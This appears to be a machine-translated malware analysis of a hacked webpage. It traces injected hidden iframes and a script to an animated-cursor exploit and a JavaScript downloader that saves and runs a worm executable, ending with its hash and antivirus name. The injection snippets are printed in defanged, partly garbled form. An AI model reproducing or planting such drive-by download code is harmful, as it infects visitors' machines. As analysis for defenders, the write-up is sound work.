EndurerOriginal
1Version
Code added to the webpage:
/-----
<IFRAME src = hxxp: // www. Xa ** it * an.cn/mm/mm.htm width = 0 Height = 0> </iframe>
---/
Mm.htm contains code:
/---
<IFRAME src = hxxp: // www.97 *** 72 * 5.com /? 01 *** 6 width = 0 Height = 0> </iframe>
---/
Hxxp: // www.97 *** 72 * 5.com /? 01 **** 6
Code included:
/---
<Body style = 'cursor: URL (hxxp: // www.97 *** 72 * 5.com/m?uxiao=#2.jpg) '> </body>
<SCRIPT src = hxxp: // www.97 *** 72 * 5.com/0620.20.20.20.14.js> </SCRIPT>
---/
Hxxp: // www.97 *** 72 * 5.com/m?uxiao=**2.jpg (Kaspersky: exploit.win32.img-ani.k?use the animation hole to download 97725.exe
Hxxp: // www.97 *** 72 * 5.com/0620.20.20.20.14.js
The content is Javascript script code. The function is to use Microsoft. XMLHTTP and scripting. FileSystemObject to download the 97725.exefile and save it to % WINDIR %.
/---
Function Gn (n) {var number = math. Random () * n; return '~ TMP '+'. tmp ';}
---/
Generate, that is ~ TMP. tmp. Then run the command % WINDIR %/system32/cmd.exe/C % WINDIR %/~ through the ShellExecute method of the shell. Application Object Q /~ TMP. tmp to run.
File description:D:/test/97725.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time: 12:54:18
Modification time: 12:59:23
Access time:
Size: 64645 bytes, 63.133 KB
MD5: 8d5e8b2ba870f4d23a460ee5c9a2ca7d
Kaspersky reports:Worm. win32.viking. IX